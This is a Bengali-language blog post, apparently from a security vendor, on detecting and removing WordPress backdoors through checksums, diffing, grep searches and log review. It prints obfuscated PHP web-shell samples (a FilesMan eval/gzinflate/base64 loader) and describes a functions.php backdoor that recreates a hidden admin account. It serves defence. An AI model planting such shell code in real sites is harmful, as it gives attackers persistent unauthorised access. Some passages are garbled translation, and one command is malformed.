লক্ষ লক্ষ ওয়ার্ডপ্রেস সাইট প্রতি বছর সংক্রমিত হয় এবং সংখ্যা বাড়ছে। এই হ্যাক করা ওয়েবসাইটগুলি তারপরে তাদের ট্রাফিককে সন্দেহজনক ওয়েবসাইটগুলিতে পুনঃনির্দেশ করে জালিয়াতি এবং স্প্যাম ছড়াতে ব্যবহার করা হয়৷ প্রায়শই মালিক এবং বিকাশকারীরা সংক্রমণ সম্পর্কে অসচেতন হতে পারে৷ সংক্রমণ ক্রমাগত হতে পারে বা নাও হতে পারে। সুতরাং, একটি ভালভাবে লাগানো ওয়ার্ডপ্রেস ব্যাকডোর আক্রমণ বজায় রাখতে সাহায্য করে।
ওয়ার্ডপ্রেস ব্যাকডোর কি?
একটি ওয়ার্ডপ্রেস ব্যাকডোর হল এমন একটি কোড যা আক্রমণকারীকে সার্ভারে অননুমোদিত এবং অবিরাম অ্যাক্সেসের অনুমতি দেয়। প্রায়শই এটি কোথাও না কোথাও লুকানো একটি ক্ষতিকারক ফাইল হয়ে থাকে । অথবা অনেক সময় এটি একটি সংক্রামিত প্লাগইন হতে পারে। ওয়ার্ডপ্রেস ব্যাকডোর হ্যাক এর নতুন ভেরিয়েন্ট প্রতি মাসে পাওয়া যাবে।
হ্যাকাররা সবসময় ওয়ার্ডপ্রেস ব্যাকডোরে ইনজেক্ট করার চেষ্টা করে থাকে। কয়েক বছর ধরে সংক্রমণ ছড়াতে ব্যবহৃত হয়েছে এমন একাধিক প্লাগইন রয়েছে। তাই হুমকি যে কোনো জায়গা থেকে হতে পারে। পরবর্তীতে, ওয়ার্ডপ্রেসের ব্যাকডোরগুলি সরিয়ে ফেলা এটি একটি সময় ও পরিশ্রমযুক্ত প্রক্রিয়া হতে পারে। তবে প্রতিরোধমূলক ব্যবস্থা সর্বদা ক্ষতি নিয়ন্ত্রণ করতে পারে। একটি নিরাপদ ওয়ার্ডপ্রেস সাইট আক্রমণ ঠেকাতে না পারলে বিলম্ব করতে পারে। আমরা এই ব্লগে একটি ওয়ার্ডপ্রেস ব্যাকডোর খুঁজে বের করা এবং ঠিক করার বিষয়ে দেখব।
কি একটি ওয়ার্ডপ্রেস ব্যাকডোর হ্যাক বাড়ে?
একটি ওয়ার্ডপ্রেস সাইট সেট আপ করা যুক্তিসঙ্গতভাবে আরামদায়ক। কিন্তু একাধিক ফাঁকফোকর একটি ওয়ার্ডপ্রেস ব্যাকডোর জন্য পথ প্রশস্ত করতে পারে. সুতরাং, সরলতার জন্য, আমরা এটিকে প্রধান কয়েকটিতে সংকুচিত করতে পারি। এইগুলো:
- কখনও কখনও এটি একটি কারণে হতে পারে বগি প্লাগইন বা একটি থিম.
- আপনার সাইটে লগইন শংসাপত্র দুর্বল বা ডিফল্ট হতে পারে.
- ফাইলের অনুমতি দুর্বল সংবেদনশীল ফাইল প্রকাশ করতে পারে.
- ব্যবহার না করা a ফায়ারওয়াল বা নিরাপত্তা সমাধান কিছু ধরণের।
- ইনস্টলেশন পুরানো হতে পারে.
- অন্যান্য ওয়েবসাইটের সাথে একটি সংক্রামিত সার্ভার ভাগ করা। সাবনেটিংয়ের জন্য আপনার পরিষেবা প্রদানকারীকে জিজ্ঞাসা করুন।
সম্পর্কিত নির্দেশিকা – ওয়ার্ডপ্রেস নিরাপত্তার জন্য ধাপে ধাপে সম্পূর্ণ নির্দেশিকা (হ্যাক হওয়ার ঝুঁকি 90% কমিয়ে দিন)
ওয়ার্ডপ্রেস ব্যাকডোর খোঁজা
থিমগুলিতে ওয়ার্ডপ্রেস ব্যাকডোর হ্যাক সনাক্ত করা
নিষ্ক্রিয় থিমগুলি একটি ওয়ার্ডপ্রেসের ব্যাকডোর লুকানোর সেরা জায়গা। হ্যাকাররা এই সত্যটি সম্পর্কে সচেতন এবং প্রায়শই আপনার সাইটে এই জাতীয় থিমগুলি সন্ধান করে। এটি নিষ্ক্রিয় হওয়ায় আপনার সেখানে পরীক্ষা করার সম্ভাবনা কম। WP থিম নামক একটি সমালোচনামূলক ফাইল রয়েছে functions.php
. এই ফাইলটি নেটিভ পিএইচপি, ওয়ার্ডপ্রেস এবং অন্যান্য ফাংশন কল করার জন্য দায়ী। তাই সহজ কথায়, এটি যে কোনো ধরনের অপারেশন করতে ব্যবহার করা যেতে পারে। প্রায়শই আক্রমণকারীরা একটি ওয়ার্ডপ্রেস ব্যাকডোর পাওয়ার জন্য এই ফাইলটি ইনজেক্ট করার চেষ্টা করে। এরকম একটি উদাহরণ নিচের ছবিতে দেওয়া হয়েছে।
এই দূষিত কোড ফাইলে উপস্থিত আছে functions.php
. আক্রমণকারী যখন URL পরিদর্শন করে তখন এটি ট্রিগার হয়: www.yoursite.com/wp-includes/registration.php
সুতরাং, তারপর এই ফাংশন সঙ্গে একটি নতুন ব্যবহারকারী তৈরি করে
id: backdooradmin
password: Pa55W0rd.
সুতরাং, আপনি ব্যবহারকারীকে মুছে ফেললেও এই URL-এ গিয়ে এটি আবার তৈরি করা যেতে পারে। এটি একটি ওয়ার্ডপ্রেস ব্যাকডোর হ্যাক একটি সাধারণ উদাহরণ। যাইহোক, এই কোডটি প্রথমে সার্ভারে অ্যাক্সেস পাওয়ার মাধ্যমে ইনজেকশন করা যেতে পারে। এটি একটি খোলা এফটিপি পোর্ট বা অন্যান্য ত্রুটিগুলি ব্যবহার করতে পারে।
আপনার ওয়ার্ডপ্রেস ওয়েবসাইট সুরক্ষিত
হ্যাকাররা হ্যাক করার চেষ্টা করার আগেই!
Astra ওয়েবসাইট সুরক্ষা হাজার হাজার ওয়ার্ডপ্রেস সাইটকে সাইবার আক্রমণ প্রতিরোধে সহায়তা করেছে।
প্লাগইনগুলিতে ওয়ার্ডপ্রেস ব্যাকডোর সনাক্ত করা
একটি ওয়ার্ডপ্রেস ব্যাকডোর হ্যাক প্রায়ই কারণে বগি প্লাগইন. একাধিক প্লাগইন কয়েক বছর ধরে বগি পাওয়া গেছে। এই বছর সর্বশেষ এক ছিল যোগাযোগ ফর্ম 7. এই প্লাগইনটির 5 মিলিয়নেরও বেশি সক্রিয় ব্যবহারকারী রয়েছে। বিপরীতে, বাগটি একটি বিশেষাধিকার বৃদ্ধির দিকে পরিচালিত করেছিল। যখন প্লাগইন ফাইলগুলি পরিবর্তন করা হয়, তখন এটি ড্যাশবোর্ডে দৃশ্যমান নাও হতে পারে৷ যাইহোক, একটি FTP অনুসন্ধান এই ধরনের ফাইল প্রকাশ করতে পারে। আরও এটিকে বৈধ দেখাতে, ব্যাকডোর ফাইলগুলিকে হেল্প ফাইল হিসাবে নামকরণ করা হয়েছে। প্লাগইনগুলিতে পিছনের দরজাগুলি পাওয়া যাওয়ার কারণগুলি হল:
- অব্যবহৃত প্লাগইনগুলি সংক্রামিত হওয়ার সম্ভাবনা বেশি। শুধুমাত্র কারণ তারা দীর্ঘ সময়ের জন্য পিছনের দরজা লুকিয়ে রাখতে পারে।
- অবিশ্বস্ত এবং অজনপ্রিয় প্লাগইনগুলি প্রায়ই খারাপভাবে কোড করা হয়। এইভাবে একটি WordPress ব্যাকডোর হ্যাক সম্ভাবনা বৃদ্ধি.
- পুরানো প্লাগইনগুলি লক্ষ্য হওয়ার সম্ভাবনা বেশি। শুধু এই কারণে যে অনেকে এখনও আপডেট না করেই চালাচ্ছেন।
- এই বগি প্লাগইনগুলি অন্যান্য মূল ফাইলগুলি পরিবর্তন করতে সাহায্য করতে পারে।
তাই কোন অজানা প্লাগইন জন্য সন্ধান করুন. সমস্ত অব্যবহৃত প্লাগইন পরিষ্কার করুন!
ইনস্টলেশন ফাইলে ওয়ার্ডপ্রেস ব্যাকডোর সনাক্ত করা
প্লাগইন সংক্রামিত হওয়ার পরে মূল ফাইলগুলি পরিবর্তন করা হয়। বেস ফাইলে দুর্বৃত্ত কোড থাকতে পারে বা নতুন ফাইল প্রদর্শিত হতে পারে। মাঝে মাঝে পিছনের দরজাটি এখানে এইরকম অস্বস্তিকর মনে হতে পারে:
$t43="l/T6\\:aAcNLn#?rP}1\rG_ -s`SZ\$58t\n7E{.*]ixy3h,COKR2dW[0!U\tuQIHf4bYm>wFz<[email protected]&(BjX'~|ge%p+oMJv^);\"k9";
$GLOBALS['ofmhl60'] = ${$t43[20].$t43
এই কোডটি পরিচিত কৌশল ব্যবহার করে অস্পষ্ট করা হয়েছে। এইভাবে মানুষের ব্যবহারকারীদের পড়া কঠিন করে তোলে। সুতরাং, এই জাতীয় মাছের চেহারার কোডটি সন্ধান করুন এবং এতে থাকা ফাইলগুলি সরিয়ে ফেলুন। অনেক সময় ব্যাকডোর নিজেকে একটি বৈধ ফাইল হিসাবে উপস্থাপন করতে পারে যেমন xml.php, media.php, plugin.php ইত্যাদি। তাই বৈধ মনে হলেও কোনো ফাইল এড়িয়ে যাবেন না। তাছাড়া, কোড পড়া কঠিন করার জন্য অন্যান্য কৌশল রয়েছে।
এছাড়াও, কীওয়ার্ডের জন্য তাকান ফাইলসম্যান আপনার ফাইলে। উদাহরণস্বরূপ, এটি কুখ্যাত ব্যাকডোরের ডাম্প ফাইলম্যান: 02. এই ব্যাকডোর সনাক্ত করা কঠিন এবং লগগুলিতে দৃশ্যমান নয়৷ এটি পাসওয়ার্ড এবং অন্যান্য বিবরণ চুরি করতে ব্যবহৃত হয়।
<?php
$auth_pass = "";
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","x65x76x61x6Cx28x67x7Ax69x6Ex66x6Cx61x74x65x28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/t..NRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc="x29x29x29x3B",".");
?>
উদাহরণস্বরূপ, 6 তম লাইনের কোডটি হেক্স আকারে রয়েছে। রূপান্তরিত হলে এটি এমন কিছু দেখাবে: preg_replace("/.*/e","eval(gzinfla\
. সেখানে টুলস হেক্স অক্ষর ডিকোড করার জন্য অনলাইন উপলব্ধ। তাদের ব্যাবহার করুন! এছাড়াও, আক্রমণকারী base64 এনকোডিং ব্যবহার করে কোড লুকাতে পারে। তাই একইভাবে আচরণ করুন। এখানে কীওয়ার্ড FilesMan
৪র্থ লাইনে উপস্থিত। এই সংক্রমণের এই ধরনের বৈকল্পিক এই কীওয়ার্ড আছে. অনেক সময় এটা সম্ভব যে কোডটি সংবেদনশীল ফাইলগুলির সাথে টেম্পারিং হতে পারে .htaccess
. তাই এই মাধ্যমে একটি ভাল চেহারা নিশ্চিত করুন!
কিভাবে ওয়ার্ডপ্রেস ব্যাকডোর হ্যাক ঠিক করবেন?
চেকসাম তুলনা করা
প্রথম ধাপ হল চেকসাম তুলনা করা। এটি ফাইলের অখণ্ডতার একটি হিউরিস্টিক সংকল্প। ম্যানুয়াল পরিদর্শন করা যেতে পারে। তাছাড়া, এই উদ্দেশ্যে বিনামূল্যে উপলব্ধ স্বয়ংক্রিয় সরঞ্জাম আছে. শুধুমাত্র মূল ফাইলের জন্য নয়, চেকসামগুলি প্লাগইন এবং থিমের জন্যও উপলব্ধ। তাছাড়া, আপনি একটি ব্যক্তিগত কালো তালিকা বজায় রাখতে পারেন। পাবলিক ডোমেনে উপলব্ধ তালিকা ব্যবহার করে এটি করা যেতে পারে। চেকসাম না মেলে ম্যানুয়ালি ওয়ার্ডপ্রেসের পিছনের দরজাগুলি সরাতে এগিয়ে যান।
কোর ফাইল অখণ্ডতা
দ্বিতীয়ত, ফাইলগুলি দেখানোর পরে বিভিন্ন চেকসাম মানগুলি ম্যানুয়ালি পরিদর্শন করে। এটা খুব সম্ভব যে ওয়ার্ডপ্রেস ব্যাকডোর হ্যাক ফাইল টেম্পারড হতে পারে. সুতরাং, ইনস্টলেশন ফাইলের অখণ্ডতা যাচাই করা যেতে পারে। ওয়ার্ডপ্রেসের একটি তাজা কপি ডাউনলোড করে শুরু করুন।
$ mkdir WordPress
$ cd WordPress
এই কমান্ডটি নামে একটি ডিরেক্টরি তৈরি করেছে WordPress
এবং যে উপর সুইচ.
$ wget https://github.com/WordPress/WordPress/archive/4.9.8.zip
$ tar -zxvf 4.9.8.zip
এখন কোডের প্রথম লাইন ব্যবহার করে ওয়ার্ডপ্রেসের সর্বশেষ সংস্করণ (এই ক্ষেত্রে 4.9.8) ডাউনলোড করুন। দ্বিতীয় লাইন তারপর এটি নিষ্কাশন. এই কাজগুলি সম্পন্ন করার পরে, গুরুত্বপূর্ণ পদক্ষেপ আসে। $ diff -r path/to/your/file.php
/Wordpress/wp-cron.php
. এই কোড দুটি ফাইলের মধ্যে পার্থক্য তুলনা. যেহেতু ওয়ার্ডপ্রেস ব্যাকডোর আপনার ফাইলগুলিকে সম্পাদনা করবে, এটি পরিবর্তনগুলি দেখাবে। যাইহোক, কয়েকটি ফাইল এর মত গতিশীল xmlrpc.php
. এই ফাইলটি ব্যবহারকারীদের এবং পরিষেবাগুলিকে RPC এর মাধ্যমে সাইটের সাথে ইন্টারঅ্যাক্ট করতে সাহায্য করে৷ হ্যাকাররা এটা জানে এবং প্রায়ই এখানে ব্যাকডোর লুকানোর চেষ্টা করে। তাই ওয়ার্ডপ্রেসের পিছনের দরজাগুলি খুঁজে পেতে এবং সরাতে এটি পুঙ্খানুপুঙ্খভাবে পরীক্ষা করুন।
এনকোডিং
অনেক সময় ফাইলগুলি পরিবর্তিত দেখাতে পারে কিন্তু আপনার কাছে অপঠনযোগ্য হতে পারে। তারপর, আপনি অনুসন্ধান করে ওয়ার্ডপ্রেস ব্যাকডোর হ্যাক ক্লিনআপ শুরু করতে পারেন বেস64 এনকোডিং. এই যেখানে grep
আদেশ বিস্ময়কর কাজ করতে পারে. নিম্নলিখিত কমান্ড ব্যবহার করুন:
find . -name "*.php" -exec grep "base64""{}'\; -print &> output.txt
এই কমান্ড সুন্দরভাবে সব তালিকা করা হবে বেস64 সনাক্তকরণ output.txt-এ। এখান থেকে আপনি অনলাইন ব্যবহার করে প্লেইনটেক্সটে ডিকোড করতে পারেন টুলস ব্যবহার করে. এছাড়াও, যদি আপনি অন্য ফাইল অনুসন্ধান করতে চান .php
শুধু শব্দ প্রতিস্থাপন *.php
কোডে তাছাড়া, ক্ষতিকারক কোডটি হেক্স ফরম্যাটেও হতে পারে। তাই আপনি ব্যবহার করতে পারেন grep -Pr "[\x01\x02\x03]"
. অন্যান্য অনুরূপ এনকোডিংয়ের জন্য এই পদক্ষেপটি পুনরাবৃত্তি করুন। ওয়ার্ডপ্রেসের ব্যাকডোরগুলি সরাতে এই ফাইলগুলি বা ক্ষতিকারক কোডের লাইনগুলি মুছুন৷
সার্ভার লগ ব্যবহার করে
সার্ভার লগগুলি ওয়ার্ডপ্রেস ব্যাকডোর গুলি সরাতে সাহায্য করতে পারে। প্রথমত, আপনাকে একটি নির্দিষ্ট তারিখের পরে কোন ফাইলগুলি সম্পাদনা করা হয়েছে তা দেখতে হবে। এছাড়াও, আপনার সার্ভারের সাথে সংযোগ করতে ব্যবহৃত আইপিগুলি দেখতে FTP লগগুলি দিয়ে যান৷ সম্প্রতি সম্পাদিত ফাইলগুলির উপর একটি ট্যাব রাখুন। তাছাড়া ইমেজ ফোল্ডার জন্য সন্ধান. কেউ ইমেজ ফোল্ডারে এক্সিকিউটেবল উপস্থিত থাকার আশা করে না। উপরন্তু, ইমেজ ফোল্ডার লেখার যোগ্য হতে পারে. এজন্য হ্যাকাররা সেখানে পিছনের দরজা লুকিয়ে রাখতে পছন্দ করে। এছাড়াও, এটি নিশ্চিত করুন অনুমতি সংবেদনশীল ফাইলের জন্য উপযুক্ত। এইভাবে আপনার ফাইল অনুমতি সেট করুন 444 (r–r–r–)
অথবা হতে পারে 440 (r–r—–)
. ইমেজ ফোল্ডারে কোন পরিবর্তনের জন্য বিশেষভাবে দেখুন.
আপডেট এবং ব্যাকআপ
আপনার ওয়ার্ডপ্রেস ওয়েবসাইট আপডেট করার গুরুত্ব বারবার জোর দেওয়া হয়েছে। একটি পুরানো ইনস্টলেশন একটি সংক্রামিত এক হিসাবে ভাল.
আপনি যদি ওয়ার্ডপ্রেস ব্যাকডোর হ্যাকের কারণ খুঁজে বের করতে না পারেন, তবে বর্তমান সাইটের ব্যাকআপ নেওয়ার পরেই এটিকে ব্যাকআপ থেকে পুনরুদ্ধার করুন এবং তারপরে দুটির তুলনা করুন।
আপনার যদি বিদ্যমান ব্যাকআপ না থাকে এবং মূল ওয়ার্ডপ্রেস ফাইলগুলিকে তাজা দিয়ে প্রতিস্থাপন করতে চান। যে জন্য, আপনি প্রয়োজন ম্যানুয়ালি আপনার ওয়ার্ডপ্রেস ওয়েবসাইট আপডেট করুন বর্তমান সাইট ব্যাকআপ নেওয়ার পরে।
অধিকন্তু, আপনি যে প্লাগইনগুলি ব্যবহার করেন তার সাথে যদি কোনো দুর্বলতা রিপোর্ট করা হয়, তাহলে অবিলম্বে সেগুলি আপডেট করার পরামর্শ দেওয়া হয়৷ যদি প্যাচটি খুব বেশি সময় নেয় তবে এটি বিকল্পগুলির সাথে প্রতিস্থাপন করুন। তাড়াতাড়ি প্যাচ পেতে অফিসিয়াল ব্লগের সাথে আপডেট থাকার পরামর্শ দেওয়া হচ্ছে।
ওয়ার্ডপ্রেস ব্যাকডোর স্ক্যানার ব্যবহার করুন
মানুষ ভুল প্রবণ হয়. ম্যানুয়ালি পরিদর্শন করা ক্লান্তিকর এবং ত্রুটির প্রবণ। এটি ওয়ার্ডপ্রেস ব্যাকডোর হ্যাক পুনরায় ঘটতে পারে। তাই এর সমাধান হল অটোমেশন। বাজারে আজ বেশ উন্নত ব্যবস্থা আছে. এই স্ক্যানারগুলি লুকানো ওয়ার্ডপ্রেস ব্যাকডোর অবস্থান সনাক্ত করতে পারে এবং সেই ব্যাকডোর অপসারণের পদক্ষেপগুলি প্রদান করতে পারে।
সঠিক, দ্রুত এবং মেশিন লার্নিং চালিত ওয়েবসাইট ম্যালওয়্যার স্ক্যানার
এখন আপনার আঙুলের ডগায়।
ওয়েবসাইট কালো তালিকা চেক করুন | 140+ নিরাপত্তা পরীক্ষা চালান | এসইও স্প্যাম এবং জাপানি কীওয়ার্ড হ্যাক চেক করুন
ট্যাগ: ওয়ার্ডপ্রেস ব্যাকডোরস, ওয়ার্ডপ্রেস হ্যাক, ওয়ার্ডপ্রেস দুর্বল প্লাগইন এবং থিম